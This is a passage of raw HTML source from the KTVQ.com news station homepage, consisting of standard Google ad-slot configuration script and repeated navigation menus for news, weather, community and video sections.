el.parentElement) && !el.classList.contains(targetParentClass)); if (el) { el.classList.add("no-ad"); } } }); googletag.cmd = googletag.cmd || []; googletag.cmd.push(function () { var mapping1 = googletag.sizeMapping(). addSize([1024,0],[]). //desktop addSize([0,0],[320, 50]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/142953540/KTVQ/ktvq.com', [320,50], 'div-gpt-ad-1') .defineSizeMapping(mapping1) .setTargeting("pos", "atf") .setTargeting("wp_unit", "Smartphone Banner") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); var mapping2 = googletag.sizeMapping(). addSize([1024,0],[1060, 250]). //desktop addSize([0,0],[]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/142953540/KTVQ/ktvq.com', [1060,250], 'div-gpt-ad-2') .defineSizeMapping(mapping2) .setTargeting("pos", "atf") .setTargeting("wp_unit", "Billboard_Homepage") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); var mapping11 = googletag.sizeMapping(). addSize([1024,0],[]). //desktop addSize([0,0],[320, 50]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/142953540/KTVQ/ktvq.com/Adhesion', [320,50], 'div-gpt-ad-11') .defineSizeMapping(mapping11) .setTargeting("wp_unit", "Adhesion") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); googletag.cmd.push(function() { googletag.defineSlot('/142953540/KTVQ/ktvq.com/Native_Headline', ['fluid'], 'div-gpt-ad-12') .setTargeting("wp_unit", "Native_Headline") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); googletag.cmd.push(function() { googletag.defineSlot('/142953540/KTVQ/ktvq.com/Native_Image', ['fluid'], 'div-gpt-ad-13') .setTargeting("wp_unit", "Native_Image") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); googletag.cmd.push(function() { googletag.defineSlot('/142953540/KTVQ/ktvq.com/Native', ['fluid'], 'div-gpt-ad-15') .setTargeting("wp_unit", "Native") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); var mapping4 = googletag.sizeMapping(). addSize([1024,0],[120, 30]). //desktop addSize([0,0],[120, 30]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/142953540/KTVQ/ktvq.com', [120,30], 'div-gpt-ad-4') .defineSizeMapping(mapping4) .setTargeting("pos", "atf") .setTargeting("wp_unit", "Weather Tile") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); var mapping5 = googletag.sizeMapping(). addSize([1024,0],[300, 250]). //desktop addSize([0,0],[320, 50]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/142953540/KTVQ/ktvq.com', [[300,250],[320,50]], 'div-gpt-ad-5') .defineSizeMapping(mapping5) .setTargeting("pos", "atf") .setTargeting("wp_unit", "Top 1:1") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); var mapping7 = googletag.sizeMapping(). addSize([1024,0],[300, 250]). //desktop addSize([0,0],[300, 250]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/142953540/KTVQ/ktvq.com', [300,250], 'div-gpt-ad-7') .defineSizeMapping(mapping7) .setTargeting("wp_unit", "Middle 1:1") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); var mapping8 = googletag.sizeMapping(). addSize([1024,0],[728, 90]). //desktop addSize([0,0],[320, 50]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/142953540/KTVQ/ktvq.com', [[728,90],[320,50]], 'div-gpt-ad-8') .defineSizeMapping(mapping8) .setTargeting("wp_unit", "Middle 8:1 - HOMEPAGE") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); var mapping9 = googletag.sizeMapping(). addSize([1024,0],[[300,600], [300,250]]). //desktop addSize([0,0],[300, 250]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/142953540/KTVQ/ktvq.com', [[300,600],[300,250]], 'div-gpt-ad-9') .defineSizeMapping(mapping9) .setTargeting("wp_unit", "Bottom 1:1") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); var mapping10 = googletag.sizeMapping(). addSize([1024,0],[728, 90]). //desktop addSize([0,0],[320, 50]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/142953540/KTVQ/ktvq.com', [[728,90],[320,50]], 'div-gpt-ad-10') .defineSizeMapping(mapping10) .setTargeting("wp_unit", "Bottom 8:1") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); googletag.pubads().setTargeting("wp_keyword", ["Home"]); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); </script> </head> <body class="home page-template page-template-elementor_header_footer page page-id-672 elementor-default elementor-template-full-width elementor-page elementor-page-672 elementor-page-4653 elementor-page-4646 elementor-page-4657 format-text"> <!--[if lt IE 7]><p class="chromeframe">Your browser is <em>ancient!</em> <a href="http://browsehappy.com/">Upgrade to a different browser</a> or <a href="http://www.google.com/chromeframe/?redirect=true">install Google Chrome Frame</a> to experience this site. </p><![endif]--> <div id="container"> <section id="top-bar"> <div class="container"> <div class="pull-left"> </div> <div class="pull-right"> </div> </div><!-- .container --> </section> <header id="header" class="logo-left" role="banner"> <div class="container"> <div class="logo"> <div class="logo-img"> <a href="https://ktvq.com/" rel="home"><img src="http://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2018/07/27145131/ktvq-site-logo-60h.png" alt="KTVQ.com" class="logo-img-primary"/></a> </div> <button type="button" class="navbar-toggle visible-xs" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div><!--.logo --> <nav class="nav-main" role="navigation"> <div class="navbar-collapse collapse"> <div class="nav-main-inner"> <ul id="menu-main-menu" class="sf-menu hidden-xs"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-news first-item menu-item-4708"><a href="https://ktvq.com/category/news/"><span>News</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-local-news menu-item-4718"><a href="https://ktvq.com/category/news/local-news/"><span>Local News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-political-news menu-item-88039"><a href="https://ktvq.com/category/news/political-news/"><span>Political News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-montana-news menu-item-4720"><a href="https://ktvq.com/category/news/montana-news/"><span>Montana News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-national-news menu-item-4722"><a href="https://ktvq.com/category/news/national-news/"><span>National News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-crime-watch menu-item-22664"><a href="https://ktvq.com/category/news/crime-watch/"><span>Crime Watch</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-digital-original menu-item-27561"><a href="https://ktvq.com/category/news/digital-original/"><span>Digital Original</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-montana-ag-network menu-item-22061"><a href="https://ktvq.com/montana-ag-network/"><span>Montana Ag Network</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-montana-made menu-item-23867"><a href="https://ktvq.com/montana-made/"><span>Montana Made</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-q2-rewind menu-item-13497"><a href="https://ktvq.com/q2-rewind/"><span>Q2 Rewind</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-fire-watch menu-item-25105"><a href="http://ktvq.com/fire-watch/"><span>Fire Watch</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-trending menu-item-22085"><a href="https://ktvq.com/category/news/trending/"><span>Trending</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-weather menu-item-4742"><a href="https://ktvq.com/weather/"><span>Weather</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-stormtracker-doppler menu-item-4740"><a href="https://ktvq.com/stormtracker-doppler/"><span>STORMTracker Doppler</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-travel-conditions menu-item-4762"><a href="https://ktvq.com/travel-conditions/"><span>Travel Conditions</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-interactive-radar-map menu-item-4761"><a href="https://ktvq.com/interactive-radar-map/"><span>Interactive Radar Map</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-ski-report menu-item-100993"><a href="http://ktvq.com/ski-report/"><span>Ski Report</span></a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-sports menu-item-4728"><a target="_blank" href="http://montanasports.com"><span>Sports</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-community menu-item-4707"><a href="https://ktvq.com/category/community/"><span>Community</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-mtn-powder-pass menu-item-122153"><a target="_blank" href="https://my406deals.incentrev.com/billings/9000104-mtn-powder-pass"><span>MTN Powder Pass</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-foodie-fridays menu-item-6736"><a target="_blank" href="https://www.q2deals.com/deal/default?redirectUrl=home.action&amp;showSplashPopup=true"><span>Foodie Fridays</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-a-better-you menu-item-22666"><a href="https://ktvq.com/a-better-you/"><span>A Better You</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-a-waiting-child menu-item-22665"><a href="https://ktvq.com/a-waiting-child/"><span>A Waiting Child</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-under-the-big-sky menu-item-6737"><a target="_blank" href="http://underthebigsky.com"><span>Under the Big Sky</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-students-of-the-week menu-item-23204"><a href="https://ktvq.com/student-of-the-week/"><span>Students of the Week</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-athlete-of-the-week menu-item-27742"><a href="https://ktvq.com/category/community/athlete-of-the-week/"><span>Athlete of the Week</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-montana-matters menu-item-39490"><a href="https://ktvq.com/montana-matters/"><span>Montana Matters</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-on-the-job-with-rob menu-item-157477"><a href="https://ktvq.com/on-the-job-with-rob/"><span>On the Job with Rob</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-contests menu-item-38668"><a href="https://ktvq.com/contests/"><span>Contests</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-submit-anniversary-or-birthday menu-item-23203"><a href="https://ktvq.com/submit-anniversary-or-birthday/"><span>Submit Anniversary or Birthday</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-post menu-ktvq-polls menu-item-138607"><a href="https://ktvq.com/community/2019/01/31/ktvq-polls/"><span>KTVQ Polls</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-one-school-at-a-time menu-item-23376"><a href="https://ktvq.com/one-school-at-a-time/"><span>One School at a Time</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-build-billings menu-item-59730"><a target="_blank" href="https://landing.informedinteractive.com/build-billings-billings-hardware/"><span>Build Billings</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-2019-golf-card menu-item-184969"><a target="_blank" href="https://ktvq.halfoffdeal.com/index.php?index_type=promo-detail&amp;h=8638457"><span>2019 Golf Card</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-sponsored menu-item-27950"><a href="https://ktvq.com/sponsored/"><span>Sponsored</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-watch menu-item-4711"><a href="https://ktvq.com/watch/"><span>Watch</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-video menu-item-23066"><a href="https://ktvq.com/video/"><span>Video</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-photo-galleries menu-item-40031"><a href="https://ktvq.com/category/photo-galleries/"><span>Photo Galleries</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-watch-q2-news-live menu-item-23094"><a href="https://ktvq.com/live/"><span>Watch Q2 News Live</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-on-ktvq menu-item-104619"><a href="https://ktvq.com/on-ktvq/"><span>On KTVQ</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-about menu-item-4713"><a href="https://ktvq.com/about/"><span>About</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-contact-us menu-item-23524"><a href="https://ktvq.com/about/"><span>Contact Us</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-closed-captioning-information menu-item-23375"><a href="https://ktvq.com/closed-captioning-information/"><span>Closed Captioning Information</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-jobs-at-ktvq menu-item-200934"><a target="_blank" href="https://scripps.com/careers/find-a-job/"><span>Jobs at KTVQ</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-q2-apps menu-item-23373"><a href="https://ktvq.com/q2-apps/"><span>Q2 Apps</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-q2-news-staff menu-item-25545"><a href="https://ktvq.com/category/news-team/"><span>Q2 News Staff</span></a></li> </ul> </li> </ul><ul id="menu-main-menu-1" class="mobile-menu visible-xs"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children first-item menu-item-4708"><a href="https://ktvq.com/category/news/"><span>News</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4718"><a href="https://ktvq.com/category/news/local-news/"><span>Local News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-88039"><a href="https://ktvq.com/category/news/political-news/"><span>Political News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4720"><a href="https://ktvq.com/category/news/montana-news/"><span>Montana News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4722"><a href="https://ktvq.com/category/news/national-news/"><span>National News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22664"><a href="https://ktvq.com/category/news/crime-watch/"><span>Crime Watch</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27561"><a href="https://ktvq.com/category/news/digital-original/"><span>Digital Original</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22061"><a href="https://ktvq.com/montana-ag-network/"><span>Montana Ag Network</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23867"><a href="https://ktvq.com/montana-made/"><span>Montana Made</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13497"><a href="https://ktvq.com/q2-rewind/"><span>Q2 Rewind</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-25105"><a href="http://ktvq.com/fire-watch/"><span>Fire Watch</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22085"><a href="https://ktvq.com/category/news/trending/"><span>Trending</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4742"><a href="https://ktvq.com/weather/"><span>Weather</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4740"><a href="https://ktvq.com/stormtracker-doppler/"><span>STORMTracker Doppler</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4762"><a href="https://ktvq.com/travel-conditions/"><span>Travel Conditions</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4761"><a href="https://ktvq.com/interactive-radar-map/"><span>Interactive Radar Map</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-100993"><a href="http://ktvq.com/ski-report/"><span>Ski Report</span></a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4728"><a target="_blank" href="http://montanasports.com"><span>Sports</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4707"><a href="https://ktvq.com/category/community/"><span>Community</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-122153"><a target="_blank" href="https://my406deals.incentrev.com/billings/9000104-mtn-powder-pass"><span>MTN Powder Pass</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6736"><a target="_blank" href="https://www.q2deals.com/deal/default?redirectUrl=home.action&amp;showSplashPopup=true"><span>Foodie Fridays</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22666"><a href="https://ktvq.com/a-better-you/"><span>A Better You</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22665"><a href="https://ktvq.com/a-waiting-child/"><span>A Waiting Child</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6737"><a target="_blank" href="http://underthebigsky.com"><span>Under the Big Sky</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23204"><a href="https://ktvq.com/student-of-the-week/"><span>Students of the Week</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27742"><a href="https://ktvq.com/category/community/athlete-of-the-week/"><span>Athlete of the Week</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39490"><a href="https://ktvq.com/montana-matters/"><span>Montana Matters</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-157477"><a href="https://ktvq.com/on-the-job-with-rob/"><span>On the Job with Rob</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38668"><a href="https://ktvq.com/contests/"><span>Contests</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23203"><a href="https://ktvq.com/submit-anniversary-or-birthday/"><span>Submit Anniversary or Birthday</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-post menu-item-138607"><a href="https://ktvq.com/community/2019/01/31/ktvq-polls/"><span>KTVQ Polls</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23376"><a href="https://ktvq.com/one-school-at-a-time/"><span>One School at a Time</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-59730"><a target="_blank" href="https://landing.informedinteractive.com/build-billings-billings-hardware/"><span>Build Billings</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-184969"><a target="_blank" href="https://ktvq.halfoffdeal.com/index.php?index_type=promo-detail&amp;h=8638457"><span>2019 Golf Card</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27950"><a href="https://ktvq.com/sponsored/"><span>Sponsored</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4711"><a href="https://ktvq.com/watch/"><span>Watch</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23066"><a href="https://ktvq.com/video/"><span>Video</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40031"><a href="https://ktvq.com/category/photo-galleries/"><span>Photo Galleries</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23094"><a href="https://ktvq.com/live/"><span>Watch Q2 News Live</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-104619"><a href="https://ktvq.com/on-ktvq/"><span>On KTVQ</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4713"><a href="https://ktvq.com/about/"><span>About</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23524"><a href="https://ktvq.com/about/"><span>Contact Us</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23375"><a href="https://ktvq.com/closed-captioning-information/"><span>Closed Captioning Information</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-200934"><a target="_blank" href="https://scripps.com/careers/find-a-job/"><span>Jobs at KTVQ</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23373"><a href="https://ktvq.com/q2-apps/"><span>Q2 Apps</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25545"><a href="https://ktvq.com/category/news-team/"><span>Q2 News Staff</span></a></li> </ul> </li> </ul> <div class="search-header hidden-xs"> <a href="javascript:void(0);" class="search-toggle" data-target="#search-section-primary"> <i class="fa fa-search"></i> </a> </div> </div> </div> </nav><!--/#nav-menu --> </div><!-- /.container --> </header> <div class="hidden-xs"> <div id="search-section-primary" class="search-section" style="display: none;"> <div class="container"> <form role="search" method="get" class="form form-search" action="https://ktvq.com/"> <label for="s"> <span class="sr-only">Search for:</span> <input type="search" title="Search" name="s" value="" placeholder="Search..." class="field search-field"> </label> <button value="Search" class="search-submit button" type="submit">Search</button> </form><i class="fa fa-search"></i> </div> </div> </div> <section id="sub-header"> <div class="container"> <section id="custom_html-2" class="widget_text widget widget_custom_html"><div class="widget_text widget-inner"><div class="textwidget custom-html-widget">Billings, Montana | Montana's News Leader&reg;</div></div></section> <!-- <div class="pull-left">--> <!-- --> <!-- </div>--> <!-- <div class="pull-right">--> <!-- --> <!-- </div>--> </div><!-- .container --> </section> <div class="sticky-header-running"></div> <div class="sticky-header logo-left"> <div class="container"> <div class="logo"> <div class="logo-img"> <a href="https://ktvq.com/" rel="home"><img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2018/07/08142351/ktvq-site-sticky-logo.png" alt="KTVQ.com" class="logo-img-secondary"/></a> </div> <button type="button" class="navbar-toggle visible-xs" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div><!--.logo --> <nav class="nav-main" role="navigation"> <div class="navbar-collapse collapse"> <div class="nav-main-inner"> <ul id="menu-main-menu-2" class="sf-menu hidden-xs"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children first-item menu-item-4708"><a href="https://ktvq.com/category/news/"><span>News</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4718"><a href="https://ktvq.com/category/news/local-news/"><span>Local News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-88039"><a href="https://ktvq.com/category/news/political-news/"><span>Political News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4720"><a href="https://ktvq.com/category/news/montana-news/"><span>Montana News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4722"><a href="https://ktvq.com/category/news/national-news/"><span>National News</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22664"><a href="https://ktvq.com/category/news/crime-watch/"><span>Crime Watch</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27561"><a href="https://ktvq.com/category/news/digital-original/"><span>Digital Original</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22061"><a href="https://ktvq.com/montana-ag-network/"><span>Montana Ag Network</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23867"><a href="https://ktvq.com/montana-made/"><span>Montana Made</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13497"><a href="https://ktvq.com/q2-rewind/"><span>Q2 Rewind</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-25105"><a href="http://ktvq.com/fire-watch/"><span>Fire Watch</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22085"><a href="https://ktvq.com/category/news/trending/"><span>Trending</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4742"><a href="https://ktvq.com/weather/"><span>Weather</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4740"><a href="https://ktvq.com/stormtracker-doppler/"><span>STORMTracker Doppler</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4762"><a href="https://ktvq.com/travel-conditions/"><span>Travel Conditions</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4761"><a href="https://ktvq.com/interactive-radar-map/"><span>Interactive Radar Map</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-100993"><a href="http://ktvq.com/ski-report/"><span>Ski Report</span></a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4728"><a target="_blank" href="http://montanasports.com"><span>Sports</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4707"><a href="https://ktvq.com/category/community/"><span>Community</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-122153"><a target="_blank" href="https://my406deals.incentrev.com/billings/9000104-mtn-powder-pass"><span>MTN Powder Pass</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6736"><a target="_blank" href="https://www.q2deals.com/deal/default?redirectUrl=home.action&amp;showSplashPopup=true"><span>Foodie Fridays</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22666"><a href="https://ktvq.com/a-better-you/"><span>A Better You</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22665"><a href="https://ktvq.com/a-waiting-child/"><span>A Waiting Child</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6737"><a target="_blank" href="http://underthebigsky.com"><span>Under the Big Sky</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23204"><a href="https://ktvq.com/student-of-the-week/"><span>Students of the Week</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27742"><a href="https://ktvq.com/category/community/athlete-of-the-week/"><span>Athlete of the Week</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39490"><a href="https://ktvq.com/montana-matters/"><span>Montana Matters</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-157477"><a href="https://ktvq.com/on-the-job-with-rob/"><span>On the Job with Rob</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38668"><a href="https://ktvq.com/contests/"><span>Contests</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23203"><a href="https://ktvq.com/submit-anniversary-or-birthday/"><span>Submit Anniversary or Birthday</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-post menu-item-138607"><a href="https://ktvq.com/community/2019/01/31/ktvq-polls/"><span>KTVQ Polls</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23376"><a href="https://ktvq.com/one-school-at-a-time/"><span>One School at a Time</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-59730"><a target="_blank" href="https://landing.informedinteractive.com/build-billings-billings-hardware/"><span>Build Billings</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-184969"><a target="_blank" href="https://ktvq.halfoffdeal.com/index.php?index_type=promo-detail&amp;h=8638457"><span>2019 Golf Card</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27950"><a href="https://ktvq.com/sponsored/"><span>Sponsored</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4711"><a href="https://ktvq.com/watch/"><span>Watch</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23066"><a href="https://ktvq.com/video/"><span>Video</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40031"><a href="https://ktvq.com/category/photo-galleries/"><span>Photo Galleries</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23094"><a href="https://ktvq.com/live/"><span>Watch Q2 News Live</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-104619"><a href="https://ktvq.com/on-ktvq/"><span>On KTVQ</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4713"><a href="https://ktvq.com/about/"><span>About</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23524"><a href="https://ktvq.com/about/"><span>Contact Us</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23375"><a href="https://ktvq.com/closed-captioning-information/"><span>Closed Captioning Information</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-200934"><a target="_blank" href="https://scripps.com/careers/find-a-job/"><span>Jobs at KTVQ</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23373"><a href="https://ktvq.com/q2-apps/"><span>Q2 Apps</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25545"><a 